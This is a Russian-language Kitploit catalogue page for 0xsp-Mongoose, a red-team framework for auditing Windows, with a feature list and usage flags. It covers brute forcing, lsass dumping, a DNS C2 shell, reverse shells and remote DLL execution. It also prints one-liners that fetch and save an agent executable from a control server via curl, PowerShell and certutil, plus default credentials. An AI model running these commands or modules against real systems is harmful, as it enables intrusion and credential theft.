Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
0xsp-Mongoose — Уникальный фреймворк для симуляции кибербезопасности и операций Red Team, аудита Windows на новые уязвимости, неверные конфигурации и атаки повышения привилегий, воспроизводящий тактики и методы продвинутого злоумышленника в сети. | Kitploit
Инструменты/GitHubGitHub/zux0x3a/0xsp-mongoose
Повышение привилегийСканеры уязвимостейКартирование сетиАтаки на ПаролиЭксплуатацияЛатеральное перемещениеЭксплуатация веб-приложенийПост-эксплуатацияКомандование и УправлениеRed TeamingАнализ DNSArchived
5341174 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHubzux0x3a/0xsp-mongoose

0xsp-Mongoose

Уникальный фреймворк для симуляции кибербезопасности и операций Red Team, аудита Windows на новые уязвимости, неверные конфигурации и атаки повышения привилегий, воспроизводящий тактики и методы продвинутого злоумышленника в сети.

РепозиторийСайт

GPLv3 license

Поддержите проект для непрерывного развития (ETH 0xf340c15c5e669a4ababab856e9f2bccd659d6e42)

0xsp Mongoose RED для Windows

Текущий релиз 2.2.0

Версия 0xsp mongoose red предоставляется для удовлетворения ваших потребностей во время кибербезопасности симуляции. Используя эту версию, вы сможете провести аудит целевой операционной системы Windows на предмет уязвимостей системы, неправильных конфигураций и атак на повышение привилегий, а также воспроизвести тактики и техники продвинутого противника в сети.

Благодаря поддержке Node.js для веб-приложения API, установка и настройка в сжатые сроки становится намного проще. Агент-сенсор Windows будет взаимодействовать с API приложения для передачи результатов и получения команд в качестве двунаправленной техники.

Агент способен выявлять и обнаруживать эксплойты для Windows с помощью модулей windows update api и exploit database definitions. Новый релиз также обнаружит следующие уязвимости.

  • CVE-2019-0836
  • CVE-2019-0841
  • CVE-2019-1064
  • CVE-2019-1130
  • CVE-2019-1253
  • CVE-2019-1385
  • CVE-2019-1388
  • CVE-2019-1405
  • CVE-2019-1315
  • CVE-2020-0787
  • CVE-2020-0796
  • CVE-2020-0797
  • CVE-2020-1472
  • CVE-2021-1675

Возможности

  • Техники сканирования повышения привилегий Windows.
  • Веб-приложение, построенное на NodeJS
  • Поддержка SQLite DB
  • Техники латерального перемещения. видео
  • Двунаправленный канал связи. видео
  • Онлайн-упаковка плагинов.
  • Улучшенный скриптовый движок обнаружения эксплойтов.
  • Модуль брутфорса учетных записей Windows (локальный/домен)
  • Вооружение функции windows api run-as-user. Видео
  • Сканирование локальной сети и перечисление общих ресурсов.
  • Техника дампа памяти lsass (плагин).
  • Интерактивный режим оболочки DNS C2C

Установка

root@kitploit:~
git clone --single-branch --branch 0xsp-red https://github.com/lawrenceamer/0xsp-mongoose 
cd 0xsp-mongoose/ 
npm install 
node index.js

Учетные данные по умолчанию :

  • username : admin
  • password : 0xsp

DNS C2C скрипт python

root@kitploit:~
touch temp.txt
python3 dns_server.py -d DOMAIN -a PUBLICIP -i INTERFACEIP

Быстрая установка агента

root@kitploit:~
#пример 1 
curl.exe -o agent.exe http://nodejsip:4000/release/x64.exe
#пример 2 
powershell.exe -command (new-object net.webclient).downloadfile('http://nodejsip:4000/release/x64.exe','c:\tmp\agent.exe');
#пример 3 
certutil.exe -urlcache -split -f "http://nodejsip:4000/release/x64.exe" agent.exe

Использование

root@kitploit:~
-s --получить информацию о службах Windows и установленных драйверах.
-u --получить информацию о пользователях, группах, ролях.
-c --поиск подключенных драйверов для конфиденциальных файлов конфигурации по расширению.
-n --получить сетевую информацию, сетевые интерфейсы, детали подключения.
-w --перечислить доступные для записи каталоги, проверка прав доступа, измененные разрешения.
-i --получить информацию о системе Windows, сессиях, проверка Always Elevated.
-l --поиск любой строки в файле, например: agent.exe -l c:\ password *.config.
-o --указать адрес хоста приложения NodeJS, также можно использовать srvhost
-p --перечислить установленное ПО, запущенные процессы, задачи.
-e --инструмент проверки ядра, поможет найти уязвимости ядра Windows через базы данных инструментов.
-x --пароль для авторизации соединения с приложением NodeJS.
-d --скачать файлы непосредственно на целевой компьютер.
-t --загрузить файлы с целевого компьютера в приложение NodeJS.
-spooler --сканировать один хост или список хостов на возможный CVE-2021-1675 (например, -spooler -srvhost или -spooler -hosts )
-m --запустить все известные типы сканирования вместе.

[!] РАЗДЕЛ ТАКТИКИ RED TEAM

-r --запустить обратную оболочку с указанной учетной записью.
-lr --техника латерального перемещения с использованием WMI (например, -lr -host 192.168.14.1 -username administrator -password blabla -srvhost nodejsip )
-nds --обнаружение сети и перечисление общих ресурсов
-dns --установить интерактивную оболочку DNS C2C
-cmd --передача команд через HTTP Shell
-interactive --запуск интерактивного режима (например, загрузка плагинов и т.д.)
-username --аутентификация идентификатора для конкретных модулей атаки.
-password --аутентификация идентификатора для конкретных модулей атаки.
-host --указать удаленный хост для проведения атаки.
-srvhost --установить адрес удаленного хоста приложения NodeJS.
-bf --модуль брутфорса локальных пользователей / пользователей домена
-import --импорт и выполнение DLL-файла локально
-remote --импорт и выполнение DLL-файла с удаленного хоста

Документация

https://0xsp.com/security%20dev/0xsp-mongoose-red

Сайт с подробными исследованиями

https://0xsp.com

Конференции по безопасности

  • Standoff365 - Россия (https://standoff365.com/conferences/357)

Обучающие материалы по инструменту

обязательно подпишитесь на следующий канал, чтобы получать уведомления о новых руководствах и трюках для 0xsp https://www.youtube.com/channel/UCoEr6Qsyd6oMsPmaJPQ_FOg

Скачать инструмент